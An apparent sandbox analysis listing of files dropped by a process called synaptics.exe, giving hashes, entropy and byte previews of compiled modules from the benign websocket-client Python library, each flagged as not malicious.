                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11162
                                                                                                                                                                                                            Entropy (8bit):5.413978092249609
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:pfJmK7mmCkzdMfdx4cIl+UqLcHo36L5FskQJeCiROUppvaZdre82l4rn0WFV:DmTSulap8UCAo3Kn4GHppCe82+rn0o
                                                                                                                                                                                                            MD5:F7E05848C5FF628954C64974018E0DED
                                                                                                                                                                                                            SHA1:3A1098164B573AA8E476AE58411EC48F7B759A1C
                                                                                                                                                                                                            SHA-256:9FC11EAA79106A433AF0301D20581A1D81F0488100BA2DA4D2748497E0E31A19
                                                                                                                                                                                                            SHA-512:E054478F992052123B5BA66B604897A665ED1EBB79BEC17C5815333A2AFA5343FD297C679E1EBFFA343658088E4F1A387BD28625DF302BEE391D202FED55D798
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g18.......................@...sJ...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....z.d.d.l.m.Z...d.e.j.d.e.j.d.e.f.d.d...Z.W.n...e.y]......e.j.Z.d.e.j.d.e.j.d.e.f.d.d...Z.Y.n.w.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%e.e.e.e.e.e.e.e e!e"e#e$f.Z&G.d.d...d...Z'G.d d!..d!..Z(G.d"d#..d#..Z)d.S.)$.....N)...Lock)...Callable..Optional..Union.....)...WebSocketPayloadException..WebSocketProtocolException)...validate_utf8)...XorMaskerSimple..mask_value..data_value..returnc....................C...s....t.|.....|...}.|.S...N).r......process).r....r....Z.mask_result..r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_abnf.py.._mask%...s........r....c....................C...sH...t.|...}.t...|.t...}.t...|.|.d.....|.d.|.d.........t...}.|.|.A...|.t...S.).N.....)...len..int..from_bytes..native_byteorder..to_bytes).r....r....Z.datalenZ.int_data_valueZ.int_mask_valuer....r....r....r....-...s.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11162
                                                                                                                                                                                                            Entropy (8bit):5.413978092249609
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:pfJmK7mmCkzdMfdx4cIl+UqLcHo36L5FskQJeCiROUppvaZdre82l4rn0WFV:DmTSulap8UCAo3Kn4GHppCe82+rn0o
                                                                                                                                                                                                            MD5:F7E05848C5FF628954C64974018E0DED
                                                                                                                                                                                                            SHA1:3A1098164B573AA8E476AE58411EC48F7B759A1C
                                                                                                                                                                                                            SHA-256:9FC11EAA79106A433AF0301D20581A1D81F0488100BA2DA4D2748497E0E31A19
                                                                                                                                                                                                            SHA-512:E054478F992052123B5BA66B604897A665ED1EBB79BEC17C5815333A2AFA5343FD297C679E1EBFFA343658088E4F1A387BD28625DF302BEE391D202FED55D798
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g18.......................@...sJ...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....z.d.d.l.m.Z...d.e.j.d.e.j.d.e.f.d.d...Z.W.n...e.y]......e.j.Z.d.e.j.d.e.j.d.e.f.d.d...Z.Y.n.w.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%e.e.e.e.e.e.e.e e!e"e#e$f.Z&G.d.d...d...Z'G.d d!..d!..Z(G.d"d#..d#..Z)d.S.)$.....N)...Lock)...Callable..Optional..Union.....)...WebSocketPayloadException..WebSocketProtocolException)...validate_utf8)...XorMaskerSimple..mask_value..data_value..returnc....................C...s....t.|.....|...}.|.S...N).r......process).r....r....Z.mask_result..r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_abnf.py.._mask%...s........r....c....................C...sH...t.|...}.t...|.t...}.t...|.|.d.....|.d.|.d.........t...}.|.|.A...|.t...S.).N.....)...len..int..from_bytes..native_byteorder..to_bytes).r....r....Z.datalenZ.int_data_valueZ.int_mask_valuer....r....r....r....-...s.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19450
                                                                                                                                                                                                            Entropy (8bit):5.4034824191786575
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:nHJMnoF3eIfFDxNUbVr5mEtr0zSo0/3888tiYn:nHJMnoF3eIddNcrggqSo0/98ln
                                                                                                                                                                                                            MD5:864EA769D330A837A0D3C6B5CBD19FC7
                                                                                                                                                                                                            SHA1:A8E945FE7C21AB07C45A5B59C553E26D20F3CF48
                                                                                                                                                                                                            SHA-256:BC4871486B9BD856F3135DA6BBE842E366A2E516EAA1FB10BE46A99E28D4BDD8
                                                                                                                                                                                                            SHA-512:B6DA048B51679DE937098FDAAED595BCF1A2884EBE9954EF63A1BF8BDD48DFBA65F3EFFB2DF936A948D0A3B5FFF6FB38060425DA4672D914879422F4C8B0A434
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........gp^.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.g.Z.d.a.d.e.d.d.f.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z G.d.d...d...Z!d.S.)......N)...Any..Callable..Optional..Union.....)..._logging)...ABNF)...WebSocket..getdefaulttimeout).."WebSocketConnectionClosedException..WebSocketException..WebSocketTimeoutException)...SSLEOFError)...parse_url..WebSocketApp..reconnectInterval..returnc....................C...s....|.a.d.S...N)...RECONNECT).r......r.....KC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_app.py..setReconnect+...s......r....c....................@...sf...e.Z.d.Z.d.Z.d.e.d.e.e.e.d.f...d.d.f.d.d...Z.d.e.e.e.d.f...d.e.d.d.f.d.d...Z.d.e.d.e.d.d.f.d.d...Z.d.S.)...DispatcherBasez.. DispatcherBase. ..app..ping_timeoutNr....c....................C...s....|.|._.|.|._.d.S.r....).r....r....)...se
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1845
                                                                                                                                                                                                            Entropy (8bit):5.116059019173107
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:IYq+PEfF2cYReITZg0ZVzD0oOBzttwutP5iIv0UdzcbVHckuxj7kV5ZFgrI:5lPAMcBI7gPBzreIv0UdzMcLgV5KI
                                                                                                                                                                                                            MD5:61E6EF1E318603AE7E54F6D120FFF09C
                                                                                                                                                                                                            SHA1:3F5A0522C928357AC28D1A8A75E74BEE367CEFE5
                                                                                                                                                                                                            SHA-256:32598ACAF62FF25B52DDE149EC08976AB58A63CEB4F56EFAB47CA3DDFE776888
                                                                                                                                                                                                            SHA-512:F44C9C826BA2EF9FF119F090DE6B9CE0248918DC4A753C4756C9D5AA7D1ABF7E4650938E8626512A228FEE5468022171AF6E34C06AB62AB3A3876433DDD374CF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g_........................@...s(...d.d.l.Z.d.d.l.m.Z.....G.d.d...d...Z.d.S.)......N)...Optionalc....................@...sP...e.Z.d.Z.d.d.d...Z.d.e.e...d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.e.f.d.d...Z.d.S.)...SimpleCookieJar..returnNc....................C...s....i.|._.d.S.).N)...jar)...self..r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_cookiejar.py..__init__....s......z.SimpleCookieJar.__init__..set_cookiec....................C...s....|.r=t.j...|...}.|.....D.]2}.|...d.....}.r<|...d...s.d.|.....}.|.j...|...r+|.j...|...n.t.j.....}.|...|.....|.|.j.|.....<.q.d.S.d.S...N..domain...)...http..cookies..SimpleCookie..values..get..startswithr......update..lower).r....r......simple_cookie..vr......cookier....r....r......add....s..................................z.SimpleCookieJar.addc....................C...sV...|.r't.j...|...}.|.....D.].}.|...d.....}.r&|...d...s.d.|.....}.|.|.j.|.....<.q.d.S.d.S.r....).r....r....r....r....r....r....r....r....).r....r....r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18762
                                                                                                                                                                                                            Entropy (8bit):5.260785345365784
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:/5oj/9NgJBx938wlJYz2citggg7zXEjsVdTPe:/a9Nq3rlO2ciU7DEYnTPe
                                                                                                                                                                                                            MD5:87D3C1610FA82CE8CDFC09F916A4AE63
                                                                                                                                                                                                            SHA1:85D239F87F35B93B11357EDE6850902DE37523DA
                                                                                                                                                                                                            SHA-256:6EBDB0C6672BAF06F30CD5B1E4B0AB7D61E2229369CB134E1AAD6D933BC0514D
                                                                                                                                                                                                            SHA-512:87059A1CC3FD8072209918A4B836266080B5DC96656DF9EF6CA748684489E4FD3A1FC46AEDFC55A3BB2AC9E6996EBE64580AD69E92688F975B8019D934823FF9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........gXR.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l m!Z!..d.d.l"m#Z#....d.d.g.Z$G.d.d...d...Z%d.e%f.d.e&f.d.d...Z'd.S.)......N)...Optional..Union.....)...ABNF..STATUS_NORMAL..continuous_frame..frame_buffer)...WebSocketProtocolException."WebSocketConnectionClosedException)...SUPPORTED_REDIRECT_STATUSES..handshake)...connect..proxy_info)...debug..error..trace..isEnabledForError..isEnabledForTrace)...getdefaulttimeout..recv..send..sock_opt)...ssl)...NoLock..WebSocket..create_connectionc....................@...s ...e.Z.d.Z.d.Z.............dPd.e.d.e.d.e.f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.e.e.e.d.f...f.d.d...Z.d.e.e.e.d.f...f.d.d...Z.e.e.e...Z.d.d...Z.e.e...Z.d.d...Z.e.e...Z.d.d...Z.d d!..Z.e.e...Z.d"d#..Z.e.j.f.d$e.e.e.f...d%e.d.e.f.d&d'..Z.d(e.d.e.f.d)d*..Z.d+e.e.e f...d.e.f.d,d-..Z!d.e.f.d.d/..Z"d$e.d.e
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18762
                                                                                                                                                                                                            Entropy (8bit):5.260785345365784
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:/5oj/9NgJBx938wlJYz2citggg7zXEjsVdTPe:/a9Nq3rlO2ciU7DEYnTPe
                                                                                                                                                                                                            MD5:87D3C1610FA82CE8CDFC09F916A4AE63
                                                                                                                                                                                                            SHA1:85D239F87F35B93B11357EDE6850902DE37523DA
                                                                                                                                                                                                            SHA-256:6EBDB0C6672BAF06F30CD5B1E4B0AB7D61E2229369CB134E1AAD6D933BC0514D
                                                                                                                                                                                                            SHA-512:87059A1CC3FD8072209918A4B836266080B5DC96656DF9EF6CA748684489E4FD3A1FC46AEDFC55A3BB2AC9E6996EBE64580AD69E92688F975B8019D934823FF9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........gXR.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l m!Z!..d.d.l"m#Z#....d.d.g.Z$G.d.d...d...Z%d.e%f.d.e&f.d.d...Z'd.S.)......N)...Optional..Union.....)...ABNF..STATUS_NORMAL..continuous_frame..frame_buffer)...WebSocketProtocolException."WebSocketConnectionClosedException)...SUPPORTED_REDIRECT_STATUSES..handshake)...connect..proxy_info)...debug..error..trace..isEnabledForError..isEnabledForTrace)...getdefaulttimeout..recv..send..sock_opt)...ssl)...NoLock..WebSocket..create_connectionc....................@...s ...e.Z.d.Z.d.Z.............dPd.e.d.e.d.e.f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.e.e.e.d.f...f.d.d...Z.d.e.e.e.d.f...f.d.d...Z.e.e.e...Z.d.d...Z.e.e...Z.d.d...Z.e.e...Z.d.d...Z.d d!..Z.e.e...Z.d"d#..Z.e.j.f.d$e.e.e.f...d%e.d.e.f.d&d'..Z.d(e.d.e.f.d)d*..Z.d+e.e.e f...d.e.f.d,d-..Z!d.e.f.d.d/..Z"d$e.d.e
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2951
                                                                                                                                                                                                            Entropy (8bit):5.12950269116811
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:VC9Vw3WRenl4+h0CH31KO8ZUUKJjznx8uDCDcDHMjk9LQVR3qh89CK:c9Vw3Cenl4s3HFKDZXsztDAcDsMQH79B
                                                                                                                                                                                                            MD5:C9193F906181782F3F648017AACE91E6
                                                                                                                                                                                                            SHA1:1180A7D60EF22180D401FDDEA8C7EA1F7F3743CF
                                                                                                                                                                                                            SHA-256:157DFDCED155A9CD33AD290B57A3681E2B5A4284175A5F1A938DCCBC4F7EC721
                                                                                                                                                                                                            SHA-512:71C8DDF3ECEF75289B0B6DD99FE50D1CA89E76D09BD5B67A8F7598E1453898C1AFC5B2926124CC908ACCC4231B033B923E50C34796B7D7BD6439F2E0EA8544F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).ae...._exceptions.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..c....................@........e.Z.d.Z.d.Z.d.S.)...WebSocketExceptionz$. WebSocket exception class.. N....__name__..__module__..__qualname__..__doc__..r....r.....RC:\Users\user\AppData\Local\x
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5704
                                                                                                                                                                                                            Entropy (8bit):5.691904149089032
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:1r4s3HFKqfGnCzflfe8mtj6my9mZH5yEG/Zd2ROHvNI2Mr6uURW8R6:1r33HxOCzfc8IHChd+qhRPR6
                                                                                                                                                                                                            MD5:E5248A40304B4008733DA3AC01138ABE
                                                                                                                                                                                                            SHA1:D082A4E19ABE3077E2DABBF5507F65A0CAED0BD8
                                                                                                                                                                                                            SHA-256:BADD45719BE36020D43CDD24C668510DA00E5AD71885DDB20B7EE2494D189927
                                                                                                                                                                                                            SHA-512:BEA72FB5ECA7B1CDF3CE17A563C4B1B81BF222B555FFCB6FF3B2CB90C9346A6D9D9FB346BD0CFF61F713C50797BA5A45CDB39F0EF431F675E97823567D8E5F7C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g.........................@...sR...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.e.j.e.j.e.j.e.j.e.j.f.Z.e.e.j.f...Z.e...Z.G.d.d...d...Z d.e!d.e!d.e"d.e!d.e f.d.d...Z#d.e!d.e!f.d.d...Z$d.e!d.e!d.e!d.e"d.e%d.e&f.d.d...Z'e.f.d.e&d.e&f.d.d...Z(d.d d!..Z)d"e!d.e&f.d#d$..Z*d.e!f.d%d&..Z+d.S.)'ad...._handshake.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the Licens
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8111
                                                                                                                                                                                                            Entropy (8bit):5.6592606460196535
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:G33HwL4DWl5HfG443QYGo3R0wTk9SJXg2QhkmYeG:G3S4DWl5/23QYGoh0icdkveG
                                                                                                                                                                                                            MD5:9A33750C2C42A3A24D9186E8FF78C400
                                                                                                                                                                                                            SHA1:1121391DEE13B89D732BA36DB8F25C866975FFE5
                                                                                                                                                                                                            SHA-256:3AB920F7F7741234293E88AEAB91C99734F211ABE17828E8C7CEA49255A5E076
                                                                                                                                                                                                            SHA-512:C9F87D74155BC773A6749D26B60E695C3779F2C13DC487BB380DBB1FA8CE8B844D2E843030CDE03B8B737A0972F0555DB11B8340677E1FA072C3EC0AD4082F30
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g.2.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...g.d...Z.z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.Z.W.n.......d.Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"G.d.d...d.e ..Z#Y.G.d.d...d...Z$d.e%d.e&f.d.d...Z'd.e%f.d.d...Z(d.e)d.e*d.e&f.d d!..Z+d"d#..Z,d$e.j.d%e-f.d&d'..Z.d$e.j.d(e-f.d)d*..Z/d$e.j.d.e)d.e.j.f.d+d,..Z0d$e.j.d.e&f.d-d...Z1d.S.)/a_...._http.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specifi
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2440
                                                                                                                                                                                                            Entropy (8bit):4.753102652621869
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Zspkf04aURvDMDzDf+h3X0V3fFxksmtOX5uPJPZXrnquoGgBED:Ii0r803W3X0VvqtOX5uPJBloGgB4
                                                                                                                                                                                                            MD5:943DFF54F9B38130F759556A8288DDCF
                                                                                                                                                                                                            SHA1:3DDDBDB66681FC9A4F870B34229010B0CB523827
                                                                                                                                                                                                            SHA-256:9021C8BC4164AE7EAEBB3ABCD0A00366CFEA540ECF4C6C97D93B283D3F87BD40
                                                                                                                                                                                                            SHA-512:12264E99CB2F735A49A0ACFBDA322424FAFAD62A87C47C6F37D50499CAB1530ED423AB5A088CA06A7C827A405EBA71B6090CB2718F48C45BAF8B098B658E5611
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g.........................@...s&...d.d.l.Z...e...d...Z.z.d.d.l.m.Z...W.n...e.y$......G.d.d...d.e.j...Z.Y.n.w.e...e.......d.a.g.d...Z.e.....d.f.d.e.d.e.j.d.e.d.d.f.d.d...Z.d.e.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d d!..Z.d.e.f.d"d#..Z.d.S.)$.....N..websocket)...NullHandlerc....................@...s....e.Z.d.Z.d.d.d...Z.d.S.).r......returnNc....................C...s....d.S...N..)...self..recordr....r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_logging.py..emit...........z.NullHandler.emit).r....N)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....F)...enableTrace..dump..error..warning..debug..trace..isEnabledForError..isEnabledForDebug..isEnabledForTrace..DEBUG..traceable..handler..levelr....c....................C...s*...|.a.|.r.t...|.....t...t.t.|.......d.S.d.S.).z.. Turn on/off the traceability... Parameters. ----
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4062
                                                                                                                                                                                                            Entropy (8bit):5.420061415893845
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:JJkFTTnpUXHQ9VTyHLDPEoFgTHX+S6VAqcm1MlMfs:Jy3nmXoTUsoUuSE11IMfs
                                                                                                                                                                                                            MD5:C04B95566DC77381CFCA21D53DD8B277
                                                                                                                                                                                                            SHA1:8ACF7288E498B10B3D9791A24E6479C4FDFCB9E9
                                                                                                                                                                                                            SHA-256:1270AAA5DC12C844D450FB4E790A50A91A9DCF89548B71D2D2C45234E643101A
                                                                                                                                                                                                            SHA-512:6FB4B9AEDCBDC9956F77F59B12D9243E22C8D61C8C1C7DFC3DDFC7F99502E9DFC92EA6CCB010228CD5E2B0F5595DD4C5316BCDCEC9DC5B9FACF4B601B96C72F6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........gN........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j.e.j.d.f.g.Z.e.e.d...rDe...e.j.e.j.d.f.....e.e.d...rSe...e.j.e.j.d.f.....e.e.d...rbe...e.j.e.j.d.f.....e.e.d...rqe...e.j.e.j.d.f.....d.a.g.d...Z.G.d.d...d...Z.d.e.e.e.d.f...d.d.f.d.d...Z.d.e.e.e.d.f...f.d.d...Z.d.e.j.d.e.d.e f.d.d...Z!d.e.j.d.e f.d.d...Z"d.e.j.d.e.e e#f...d.e.f.d.d...Z$d.S.) .....N)...Union.....).."WebSocketConnectionClosedException..WebSocketTimeoutException)...SSLError..SSLWantReadError..SSLWantWriteError)...extract_error_code..extract_err_message..SO_KEEPALIVE..TCP_KEEPIDLE.......TCP_KEEPINTVL.......TCP_KEEPCNT.....)...DEFAULT_SOCKET_OPTION..sock_opt..setdefaulttimeout..getdefaulttimeout..recv..recv_line..sendc....................@...s"...e.Z.d.Z.d.e.d.e.d.d.f.d.d...Z.d.S.).r......sockopt..sslopt..returnNc....................C...s....|.d.u.r.g.}.|.d.u.r.i.}.|.|._.|.|._.d.|._.d.S...N).r....r......timeout)...selfr....r......r.....N
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1515
                                                                                                                                                                                                            Entropy (8bit):5.238245888587336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:WgiToV7RkwGW7mTzhZl4IpheU0E+4HQk1Gps2B5OBD8TOofF5HJu2OeuxHb:Wr07aLUI4+h0CH31KN0BQTvvVfyb
                                                                                                                                                                                                            MD5:4D225D074F4AF6C57275E1921A886249
                                                                                                                                                                                                            SHA1:ACA799FC65C01EF9FEA3F80CC2082157EA2A2854
                                                                                                                                                                                                            SHA-256:E7F6710D8C61AC41E0A6A63A9509189E4B37E700B29421EA97AF25AA8B74B1C2
                                                                                                                                                                                                            SHA-512:9FFEBB52FB4B1DA0486CBEC46F9A36506058FFD029D479DC99B7C8E72AA2268DD933F7354CF603FE4AEFA5DC6600DAA79DE4406C0FA8CEA9605327FD8FFE5DF6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g.........................@...s....d.Z.g.d...Z.z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.Z.W.d.S...e.yI......G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.Y.d.S.w.).ae...._ssl_compat.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..)...HAVE_SSL..ssl..SSLError..SSLEOFError..SSLWantReadError..SSLWantWriteError.....N).r....r....r....r....Tc....................@........e.Z.d.Z.d.S.).r....N....__name__..__module__..__qu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4378
                                                                                                                                                                                                            Entropy (8bit):5.50318295542504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:LlQBQRosjTaIzsNAuT/ceAxr6UYtSwGJBBK9WFSuGZDgQ:WBQRRXTIkB2UYPQkqGZ
                                                                                                                                                                                                            MD5:7CB80A8F78078EFEA1B29F575E5716FA
                                                                                                                                                                                                            SHA1:5017ADE544DD4514E78088C8A89AE3F9F0280114
                                                                                                                                                                                                            SHA-256:5EBF0EF8F34B8F7FAC47EAC7E4863B7420D28994EE5F6576718D8C6A115C0EC3
                                                                                                                                                                                                            SHA-512:A24C3D0E95A9991F942D44C403CF325043C596E70A939E7DC40EA91953AFC7F5B93DB115CF0C205001E693C2BF5DFE02FB3DF3AB75E4C9A8F61ECA3BC425C381
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
